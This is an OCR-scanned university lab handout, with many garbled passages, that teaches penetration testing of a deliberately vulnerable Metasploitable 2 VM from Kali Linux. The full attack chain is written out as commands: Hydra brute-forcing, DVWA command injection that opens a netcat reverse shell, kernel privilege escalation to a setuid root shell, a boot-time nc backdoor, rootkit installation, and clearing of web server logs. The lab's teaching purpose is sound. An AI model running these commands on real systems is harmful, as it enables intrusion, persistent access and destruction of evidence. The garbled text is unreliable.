Pt M pig ty SHA oly ol Lda) Ae tlt SUPCO EcOLESUPERIEURE DIS COMMUNICATIONS DE TUN Master in Data Sciences and New Digital Professions System and Network Security Lab 1: Penetration testing with Kali Linux on Metasploitable 2 Pr, Slim REKHIS lL. Lab Objective The aim of this lab is to experience ethical hacking in a virtual environment composed of two virtual machines: an attacker machine running Kali Linux (an Advanced Penetration Testing Linux distribution used for Penetration Testing) and a victim host running Metasploitable 2 (an intentionally vulnerable Ubuntu Linux virtual machine designed for testing common vulnerabilities). In this lab, you will: - Lean the penetration testing methodology. = Conduct port scanning and services enumeration on the target host. ~ Brute force the login page of a web application. ~ Exploit a command injection vulnerability on a vulnerable web server and gein an unprivileged access through a reverse shell execution - Escalate privilege and become root user on the vulnerable machine - Install a backdoor on the compromised host to maintain access. - Hide traces on the victim system by installing and configuring a rootkit. Il Penetration Testing Methodology Towell understand the path/scenario thatan attacker may use to target a victim system, we illustrate the different steps composing a comprehensive penetration test: - Step 1: Information Gathering: the attacker invests substantial time and efforts in gathering as much information as possible about the target. Information gathering can be passive (information collection about the target through publicly available sources such as social media and search engines, without making direct contact with the target) or active (use of specialized tools such as port scanners making direct contact with the target system). ~ Step 2: Enumeration: after obtaining preliminary overview of the target, the attacker moves further to know the exact services running on the target system (including types and versions) and other information such as users, shares, and DNS entries. Enumeration prepares a dearer blueprint of the target. = Step 3: Gaining Access: Based on the target blueprint obtained from the two previous phases, it's now time to exploit the vulnerabilities in the target system and gain access. Gaining access to this target system involves exploiting one or many of the vulnerabilities found during earlier stages and possibly bypassing the security controls deployed in the target system (such as antivirus, firewall, IDS, and IPS). Step 4: Escalating privilege: Quite often, exploiting a vulnerability on the target gives limited access to the system. The aim of this phase is to obtain a root level access into the target. This can be achieved sing various techniques to escalate privileges of the existing user. Once successful, the attacker obtains full control over the system with highest privileges and can possibly infiltrate deeper into it. ~ Step 5: Maintaining access: While a lot of effort has been taken in the previous steps to gain a root level access into the target system, all the work will be in vain ifthe target system will be restarted by the administrator. To avoid this, the attacker needs to make a provision for persistent access into the 1target system so that any restarts of the target system will not affect access. He can install a backdoor to maintain or ease future access. = Step G. Covering Tracks: Itis quite possible that our previous ectivities could have triggered an alarm on the security systems of the target system. The incident response team may already be in action, tracing all the evidence that may lead back to the attacker. The attacker needs to clear all the tools, exploits, and backdoors that were uploaded on the target during the compromise. Ill, Lab configuration Two virtual hosts running Linux operating system are required to achieve this lab. The firstis the attacker machine and is running Kali Linux (an Advanced Penetration Testing Linux distribution used for Penetration Testing). The second is the victim machine running Metasploitable 2 (an intentionally vulnerable Ubuntu Linux virtual machine designed for testing common vulnerabilities). The two network adapters of these machines are attached to a NAT Network, so that they can communicate to each other and talk to outside (main host. local network. and internet. ‘Attacker machine Kali Linux VM wm =. ick a Main Host Victim machine Metaspioitable 2VM NAT Network Before configuring the VM adapters, ereste 2 NAT Network from the VirtualBox GUI. To do so, Open VirtualBox Preferences (File -> Preferences) and go to Network Tab. Then click on the + icon on right side (Adds new NAT network). Finally, assign this created NAT Network to the adapter configuration of each vw. Step 1: Information Gathering 1. Start the two VMs and then log in to the attacker machine. From the command line execute ifconfig ‘command to determine the IP address/netmask of the attacker machine and netstat -r to determine the address of the gateway. In our case, the IP address of the attacker machine is 10.0.2.7, the IP network address is 10.0.2.0/24 and the gateway IP address is 10.0.2.1.lene: Flagsciieneve,aR0N0cAsT, RAWIAG WULTIAST> mtu 1500 fx packets 526 tyter 57080 (8-0 718) wc a 2973 Ros abts! fascia} Srrteai 2. The next step is to start network discovery to find neighboring hosts using netmap tool. In the following command the option "-sn" takes as input an IP address or a range and checks if a host is online or not, by sending Address Resolution Protocol (ARP) requests (if the target subnet is local) or Internet Control Message Protocol (ICMP) requests (if the target subnet is remote), $ nmap -sn 10.0.2.0/24 (kat mux kal atinue2022)-[~ Comin =n 19.0.2,0/24, starting Nmap 7. imap scan report for 1 Host is up (0.08255 Latency). Nmap scan report for 1 Host is up (0.09195 Latency). Nmap scan report for 1 Mast is up (0.0a115 Latency) Nmap dene: 256 IP addresses (2 hosts up) scanned in 3.17 seconds 92 ( https://nmap.org ) at 2022 22.4 33 10:23 coT 2.5 2.7 From the obtained results we notice the existence of a machine having the IP address 10.0.2.5 3. Having determined the adcress of the neighboring host, we can scan it to identify its open ports using nmap, by choosing SYN Scan technique: $ sudo nmap-sS 10.0.2.5 (iat iTinwx@ at tinace022)-[=) $ ida mean 55 10.0.2.5 bearting tmep 7.92 ¢ he ai(fomepeorg ) at 2022-05-29 10:21 coy jinap sean report for 16.0.2.5 host is up (0 pute spen b27tee Spen b3vtep open faztep apen freee Spen htivtep Spen lso/tcp spen 100545, Latency). ‘closed tcp poris (reset) telret dontio pening Tose rairegistry nfs postgresat ire p13 9:27:0F:59:03 (oracle Virtualdox virtual NIC) lmmap done: 2 1P adéress (1 host up) scanred in 0.62 seconds From the shown results, there are 23 open ports which can run vulnerable services.Step 2: Enumeration To identify the type and version of the target’s Operating System (OS) as wel as the remote network services running on it, We will execute conduct another nmap scan by probing the open ports to determine the service/version info (-sV), and enabling OS detection (-0) $ sudo nmap -sV -0 10.0.2.5 (Kat Sux kati nor2022 [=] $ sudo onap ~s¥ “0 10.0.2.5 lstarting nmap 7.92.( nttps://nmap.org ) at 2422-05-13 10:95 COT lrattea to resolve ~-2v" lest is" (O-eo12s Latency). ‘STATE SERVICE open Ftp ‘open telnet open sat netbios-ssn nicrosoft-ds Login ‘open rmiregistry hs24/tcp open ingrestock ceproxy-ftp postgresal 2778#:39:03 (Oracte VirtualBox virtual NIC) loevice type: general purpose Jkunning: Linux 2-6.x los detaits: Linux 2.5.9 - 2.6.33 IWetwork Distance: 1 hop los detection perforned. Please report any incorrect results at https://nmap.org/subait/ Iaeap done: 1 1b sadreze (2 test up) canted in 1.87 2 Nmap has a special flag to,activate aggressive detection, namely -A, which enables OS detection (-0), version detection (-sV), script scanning (-sC), and traceroute (--traceroute). This mode sends more probes, meking detection by the defender easier, but provides e lot of valuable host information. Execute the aggressive detection using the following command $ sudo nmap -A 10.0.2.5 Analyze the obtained results and answer the following questions: ~ Which operating system is installed on the target machine? ~ Whats the target’s kernel version? - What is the target’s hostname? ~ Check that the HTTP service is running on ports 80 = What is the name and version of the running web server daemon? From the attacker machine, connect to the victim machine on port 80 using Firefox browser. You will notice the existence of many intentionally vulnerable web applications. We will focus in the remaining part on “OVWA" (Damn Vulnerable Web Application) which is a PHP/MySQL web application that intentionally includes security vulnerabilities and is intended for educational purposes. (Open the DVWA homepage. The following webpage is displayed htto://10.0.25/dvwa/login.ohp and an authentication is required. In the sequel, we will focus on exploiting potential vulnerabilities and weaknesses on this web application to gain access. 47. To scan for potential problems and vulnerabilities on the web application, we will use the web vulnerebility scanning tool Nikto $ nikto-h httn://10.0.2.5/duwa Tyee ai) keeieecs aise aunt) oma [Sever vin rags, beer found with Fite /oma/tobot,txty inom: 63164, size: 26, tine: Tw fearse te fee d . 2 > @sion-istec® fave meaaasr2a01c82-T269-L289-cc iP" Ceveals potentially sensitive Information A lot ot vulnerabilities exist as the web application is deliberately vulnerable. Ihe selected entry in the above figure shows the existence of an accessible modification history file (CHANGELOG. txt). 8. From the attacker machine open CHANGELOG txt file from the navigator using the following URL: http://10.0.2.5/dvwa/CHANGELOG.txt ‘A quick reading of its content shows the existence of admin userVI. Step 3: Gaining Access: 9. We will try in the following steps to brute force the login page by looking for the password corresponding to the username admin that we found in the previous step. Gansaasanecausuaesaee j# Change Log v1.0.1 # lesseweeecenaeeanenns ‘Implemented different security levels. 24/05/2009 (Changed XSS from POST to GET. 22/05/2009 Some changes ta CSS. 22/85/2009 jersion nunber now in variable in header.php. 21/65/2009] \dded about page. 21/05/2009 Updated Login script to use databas 21/05/2009 Combined RFI + LFI to make "File Inclusion’. 21/05/2099 re realism to Local File Inclusion. 21/05/2009 Better error output on upload script. 21/05/2609 10. To brute force the login webpege will use Itydlra tool, but we first need to provide the following deto: — Login or Wordlist for Usernames (we know the username which is admin) — Password or Wordlist for Passwords (we will ~use = the-—- wordlist Jusr/share/wordlists/rockyou.txt.g2) — IP address or Hostname (we know that the IP address is 10.0.2.5) HTTP Method (PasT/GET) — Directory/Path to the Login Page (we have noticed that i = Request Body for Username/Password = AWay to identify Failed Attempts [dvwa/login.hp) To determine the thros information (itam« highlighted in gray) we will hoad back inte the browser, right-click, and Inspect Element. A window should pop-up on the bottom of the page. Select the Network tab. SZ Leal lan To see what happens if we attempt a login, type admin as username, choose a random password, and then click Login. Of course, this login attempt will fal, but it can be sean (by looking at the requests) that this website Is using a POST method to log-in.FO mne Demt Qome WT Qayeiaw Denim Grimey Doge fam Magia Pa ee .omm a => ae 10 ETERS cae seget Rieomeane [os Sen isnsaied rakes Soca — s 11. To find and specify the location of Username/Password Form, click on Edit and Resend. In our case the request looks like this: username=admin&password=test&Logi ER vopecer Dearie DO Grdeage TU nomn () Syeeso D Ferermane OMerory E) Senge D> e ax a 11 Q @ Cltablecahe NeTaotings © trees | 2upe0/a0 sem boi 12, Copy the request Body for Username/Password and replace the entered random Password (equal to ttest in our example) with *PASS", This will tell Hydra to enter the words from our list in this position of the request. Therefore, the modified request that we will place into Hydra command will be: username=admin&password="PASS*BLogin=Login Note that if required we could also brute-force usernames by specifying “USER® instead of admin. 13. Now we need to let Hydra how to know if it successfully logs-in during the brute-force attempts. Therefore, we will specify what the page looks like on a failed login. ‘As we saw before, the webpage shows the text “Login failed” if the login/password is false. We will copy this and paste it into our command.doin 14, After identifying all required components, we will place them into a single command under this form: sudo hydra "::" After filling in the placeholders, we obtain the following command to execute. hydra 4 admin-P /usr/share/wordlists/rockyou.txt.gz 10.0.2.5 http-postform */dvwa/login.php:username=admin&password="PASS“&Login=Login:Login failed” [ene ear ranarlenetses x layara vied (c) 20si by van Nauser/THC 6 David Maciejak ~ Please do not use in military or secret service organizations, oF Jor itegat purposes (this 4s non-binding, these # ignore laws and ethics anyway) layars (netps://github.con/ranhavser-the/the-hydra) starting at 2022-05-15 09:26:48 [oaray sax is tasks per i server, overall ie tasks, teu4sae Login tries (1:i/p:1416A369), 806805 tries yer task fovea) seoSone as as Toes [shGs2acua/daa/ tages; astoane ncanhnsonnsTa‘ehegt sagas Ft 4e0 Solfens-post-forn) host: 10-0 9-2 Topias sere pasoword: sammm=r h of 1 target successfully completed, 1 falid password found After a few second, we uncover the login/password to sign in: admin/pacsword 15. Now log in to DVWA Security and set the website Security Level to low DVWA Seeurity sent Searty16. Go to the command execution page, enter the IP address 8.8.8.8, and then click on submit. You will see the output of the ping command. ‘Command Execution Vulnerabi Ping for FREE You have certainly noticed that whenever a user enters the IP address, the web server executes it using the command: ping -c 3 8.8.8.8 17. In Linux, it is possible to run multiple commands in one line using the command separator (semicolon ). Try to check the existence of command injection vulnerability by typing: 8.8.8.8; 15-1 Vuinerability: Command Execution Ping for FREE ‘As you can see the Command Injection payload was successfully executed and the output of the command was shown. 418, Determine the username used to run the web service on the victim machine, and its UID and GIL. 10 do so, you can remotely inject the commands *whoami” and “id”. 19. Before moving to the next actions, let’s check the source code of the web application to understand the vulnerability. On the bottom of the webpage click on view source button.Command Execution Source You can notice that the code does not check if the variable Starget matches an IP address. Specifically, there isno filteringon special characters such as: | ; & which allows the attacker to append commands behind the IP address. A Command injection payload can be framed as follows: = emd1 ;emd2 Run cmdi and then cmd2, regardless of success of emd1. = emdi | cmd2 regardless of the output of cmd, cmd2 will try torun, - cmd &&cmd2 Run cmd2 if cmd succeeded = emai || cmaz Run emai it emai tatied 20. To make it easy to inject commands on the victim system, while avoiding the use of the vulnerable web application each time, we will try to obtain a reverse shell on the victim machine (A reverse shell isa shell session established on a connection that is initiated from a remote victim machine, not from the attacker's machine}. To do so, one of the easiest methods is based on the use of netcat (command tool nc], The latter is often referred to as a Swiss Army knife utility, as it can be used for port scanning, port listening, file transfer, banner grabbing, redirection, and backdoor creation. (On the attacker machine, open a shell window and type the following command to start a listener on port 1234; $ne-w-l-p 1234 Where: verbose, to show any output. to start listening -p1234, _porton which the program will listen, ~ (Kea iL imax kea Li Linux2022 )-[~ —$ nc -vv -1 -p 1234 ieteniag on Cany] 1974 21. Goto DVWA command injection tab and enter the IP address and the nc command using a separator, 8.8.8.8; nc-e /bin/sh 10.0.2.7 1234 Where: -e /bin/sh: The file which we want to execute after a successful connection all the commands that will be injected on port 1234 will be executed using this shell file) 10.0.2.7: The IP of the attacker's machine where the listener is running 1234: ‘The port on which the listener is listening. 10On the attacker machine you should see a notification message showing a successful connection from the victim machine 10.0.2.5 to the attacker machine 10.0.2.7. atten wat Ramenzoez (>) Ties stp 4234 {iscening on Cony) 1234 19.0.2.5! Saverse hast Lookup failed: Unknow Host connect to [10.0.2.71 from (UNKNOM) [10,0.2,5] 32996 22, From the attacker machine type some commands on the opened reverse shell window to collect data about the victim host = uanme-a to print information about the kernel name and version + Isb_release-a ‘to obtain information about the distribution and releas © whoai to print the current username that is running the commands * id to print the current user and group id = pwd to print the current working directory What is the system distribution and kernel version of the victim host? What is the user executing the shell commands? 23. To prove that the user lacks enough privileges, you can run the following command on the reverse shell window and notice its failure (no result is displayed) cat /etc/shadow [(iatitinax@ kata tinw2022)-[~] nc -vv -1 -p 1234 Listening on [any] 1234 ... 10.0,2.5: inverse host lookup failed: Unknown host connect to [10.0.2.7] from (UNKNOWN) [10.0.2.5] 44629 cat /etc/shadow Therefore, it becomes necessaty to find a local vulnerability to escalate privileges and get root access. (— (ha Gi nux® kat fLinux2022)-[~) Cg ne -w = =p 1238 Listening on [any] 1234 10.0.2.5: inverse host lookup failed: Unknown host connect to [10.0.2.7] from (UNKNOWN) [10.0.2,5] 32996 help index.php TINUX Wetasploitable 2-6.24-16-Server #1 SMP Thu Apr 10 13:58:00 UTC 2008 168] 6 GNU/Linux Distributor £0: Ubuntu Release: 8.0% Codename: hardy wont ee ee [oar7um/dven/valnerabiities exec . WVIL. Step 4: Escalating privilege 24, To search an exploit for the found kernel version 2.6.24 running on Ubuntu 8.04, several ways can be followed, including but are not limited to: ‘= Searching wih the opensource tool searchsploit installed on kali ‘= Search on the explcit-db.com Website ‘* Search with Google Search Engine Searchsploit provide a database which contains various exploits related to Kernel level, system level end application level. You can execute the following command to search for privilege escalation exploits: $ searchsploit privilege | grep Eg tenrchapiatt peivilge | arap -1 Ls 1 grep -1 kernel | arep 2.6 Linu kernel (Oebdan 9/38. / Ubuntu 14.00.5/36:04.2/37-00 7 Fedora 23/2/ inut teinel sca-aa/avecsu/avest” ‘arenag()* tocal pitrstese Escalation Kans wesesh ccata/esess —sasumetesntctete wadesntes esate: escsizcesr: (ey | tases tomntsomes’s [noe temel #ac) «24,277 3-611 < S.t38-re3 ~ "pipece’ Local Privilege Escal | Limw/Local/9044- oy nue xemel 2242372 omtenap()" Sound Checking Privilege Escalation | Tinux/tecal/1us.c ux | grep -ikernel | grep 2.6 ru x86/Locs1/42276.¢ run/Loeal bce rit Loest/2°962.€ nu tamel 2acae 2 nese eRe 5 ivilage tse | Linw/Locat/19993.10 mie Kemet 24.272, 0. (Cont0s 4.8/5.3 / wusty | Tim/teeat/9Se3. /tmp/run ‘echo “cp /bin/sh /bin/myshell" >> /tmp/run echo "chmod 4s /bin/myshell" >> /tmo/run ([sbin/udevd —daenon Then display the content of the created file /tmp/run cat /tmp/run echo "#i/bin/bash™ > /tmp/run echo "cp /bin/sh /bin/myshell” >> /tmp/run| fecha chmod at /hin/ayenell® 35 /tmp/ rin cat, /tmp/run #1 /bin/bash ep /bin/sh /bin/ayshelt chnod +s /bin/myshell Execute the exploit file with the pid of Netiink (2411 in our case) as a parameter. ./exploit 2411 ‘Check that file /bin/myshell has been created, is owned by root, is executable by all users, and has the setuid attribute. Is -al /bin/myshell -7exploit 2611 ls -al /bin/myshelL er igeer-f'2 701808 May 1.17:48 /bin/myshelt Run the copied suid shell with the option -p (without the option -p Linux bash will revert the effective gid and uid to the real gid and uid) /bin/myshell -p Check that the privilege has been escalated by executing id and whoami commands. ould TIE w= data) gide33(wm-data) euit(ro0t) epico(reet) srounse33(nm-data} 4Step 5: Maintaining access 39, 40. aL. 42 43, 4A, To maintain access to the victim machine and remain able to connect to is even when the system restart. We will create @ persistent backdoor using agein the neteat tool by making the vietim persistently listening on port 5005 and granting control to the attacker via a bash shell Using the opened reverse shell execute the following commands to create listener script file (listener.sh) that we will automatically execute at system startup echo "#!/bin/bash* > /etc/init.d/listener.sh echo "(while true; do nc -I-v -p 5005 -e /bin/bash; done) &" >> /etc/init.d/listener.sh Note that, by default netcat does not create a persistent connection. That is why we need to run it in ‘a while loop if we want to connect to it more than once. Otherwise, it will close the program after the first connection. Make the script file executable chmod +x /etc/init.d/listener.sh Display the arcributes and content of the created file listener.sh Is -al /etc/init.¢, cat /etc/init.d/listener.sh fs -al /etc/init.d/listener.sh “rwxr-xr-x 1 root root 67 May 4 10:24 /etc/init.d/Listener.sh| cat /etc/init.d/Listener-sh #!/b1n/pasn (uinile true; do nc -1 -v -p 5005 -e /bin/bash; done) & Execute the created script and then check that the victim machine is now listening on port 5005. Jetcfinit.d/listener.sh netstat -taun | grep 5005 [/etc/init.d/Listener.sh Inetstat -taun | grep 5005 ltep @ 0 0.0.0.0:5005 0.0.0.0:% LISTEN ‘Onthe attacker machine open a new shell window, then connect to the victim host (IP: 10.0.2.5 ; port: 5005), and then check that a root access has been granted (since the listener.sh script is executed luring oyster startup using Ure rot privilege) $ nc 10.0.2.5 5005 [lati nux® kat iLinwxz022) Cyne 10.0.2.5 5005 ry) uideo(root) gid=e(roct) ~/desktop In the remaining part, we will use this new shell window to remotely execute commands on the victim machine. Using the same window, configure listener sh to be executed at system startup (all runlevels) update-rc.d listener.sh defaultsjupdate-re.d Uistener.sh defaults Adding system startup for /etc/init.d/Listener.sh Jetc/rc0.d/K201istener.sh .../init.d/Listener-sh Jote/ret d/vaolictoner ch 2" /init d/lictenor eh Jetc/rc6.4/K201istener-sh > .. /init.d/Listener.sh Jotc/re2.4/S201istener.sh > .. /init.d/Listener-sh /etc/rc3.4/S20listener.sh 4 |. /init.d/Listener.sh Jetc/rc4.4/S20Listener.sh /Anit.d/listener-sh Zetc/rc5.4/S20listener-sh 9 |. /init.d/Listener.sh dogbees 45, List the service/daemons configured to start at the boot (runlevel 3) and their order using the following command (the name of the obtained file may change on your machine depending on the services already configured) Is ~« fete/rc3.d is =x /ete/re3.d README. Slesysklogd —S0xserver-xorg-input-vacon S1klogd sasbings Siéssh Si7nysql-neb-mgn st7portmap Signysqi-nay Siomysqt. Sigpostgresqi-2-3 Szoaistee jSz0tistener.sh] S20nfs-comon S20nfs-kernel-server S200penbsd-inetd) postTix —— $20rsyne 520samba S20xinets s50profipd —»S89atd ss9acron so0tencats.5 So1spache2 _—«S00re. local _-S99rmnologin 46. Execute the command reboot to restart the victim machine. Then check that the backdoor has started lictoning an part S05 hy traying ta cannect toit again an part SANS fram the attacker machine 16Vill, Step 6: Covering Tracks The above executed actions have left many traces on the compromised system, including the script file listener.sh stored on /etc/init.d/listener.sh; the opened port 5uU> and the upcoming 1L¥ connection trom the attacker's host established on it ; and the running process related to the started service daemon (in our case /etc/1c3.d/s20listener.shj. All these traces can be easily detected by security analysts on the compromised system using Linux commands: ps, find, |s, netstat, etc. The alm of this step is to hide these traces by installing rootkit. 47. Remotely execute this commands on the vi {the running backdoor netstat -taun | grep 5005 machine to observe the already available traces about 48. To hide these traces, we will install a Rootkit from packetstorm web site (an information security website offering current and historical computer security tools. exploits. and security advisories) on the victim's machine. © tar =a om o e First, we will download the rootkit file (from Internet) on the attacker's host (under the directory /home/kalilinux/Downloads) $ ed /home/kal $ weet https://dl.packetstormsecurity.net/UNIX/penetration/rootkits/fk.tez x/Downloads Tat i Ka ran) Amend \nwa2022)(-/oowntonds ose ak) Lapp icatten x sip) freathita/Fktge eos 4-07 2424058 (S36 AAV) ~ “Fhe” saved [922350/0112607 1 890.008 st6Ka/s An 1.78 49. On the attacker's machine, create a symbolic link to the location of the rootkit files in the web server, file directory of the attacker machine, so that you can transfer it via HTTP to the victim's host. $ sudo In -s /home/kalilinux/Downloads/k.tez /var/www/html 50. Go back to the last opened remote shell window (on the victim machine, port 5005}. Change directory to /tmp and download the rootkit file trom the attacker’s machine. Then verity that the rootkit has been successfully downloaded and extract it on the victim host. ed /tmp. weet http://10.0.2.7/fk.tgr 7Is -al fl.tgz tarzvix fk.tgz TTT ROS aL INONTOEET T-TREE Cirete.0.2.5 500s lg “| 705, faget BEEGETIO“S ie -al fh. tes srwcT=T= 1 FOOT FOO GIiTG0 Sep 29 2002 Fk.tg2 TTT Fk-0.4/CHANGES fko0.4/init 51. Asa rootkit installation will cause serious irreversible damage to the operating system of the victim machine, you should take a snapshot of the metasploitable VM before continuing, so that you can reverse changes if any problem occurs. 52. Move to fk-0.4 directory and display the content of README file to identify the files that need to be configured to hide parts and pragramson the victim hast cd fk-0.4 cat README the configuration files are in /dev/prec/Fuckit/config/ You can configure the rootkit manually oF you can use a tool for doing this’ “Pseu7proc/ fucks t/contse/tkeont™ Srports” = contains hidden remote ports you are often conrecting to = program nanes not to be’ shown in "ps" and "top = backdoor password 53. Run the installation script using the following commands. ./install Tinea ‘his WH version does not include 4 Yogeteanner' 1854. In the terminal window, enter this command to display the list of active connections and the associated ports and IP addresses netstat -protecol-inet lactive internet connections (w/o servers) lproto recv-a Send- Local. Address state hs e ESTABLISHED You can observe from this figure that the victim's host (10.0.2.5) listening on port 5005 is connected to the victim’s machine (10.0.2.7) on port 38264. Configure the rootkit to avoid displaying the locally opened port 5005 (used to run the backdoor) on the victim host. Then check that it will not appear among the list of listening ports. echo "5005" > /dev/proc/fuckit/config/Iports netstat -taunp | grep 5005 Active In connections (w/o servers) wap © 8 Locathost 44598 Locathost 44596 ESTABLISHED 55, Remove files left in /tmp folder of the victim host cd /tmp rmtk.tgz 56. Several traces were left in the access and error log of the victim’s web server, especially files: /vat/log/apache2/access.log and /var/log/apache2/error.log. You check their content using the commands: cat /var/log/apache2/access.log cat /var/log/apache2/crror.log execute the following commands to clear them. echo > /vat/log/apache2/access.log echo > /var/log/apache2/error.log Then verify that all records were successfully deleted cat /var/log/apache2/access.log cat /vat/log/apache2/error.log 19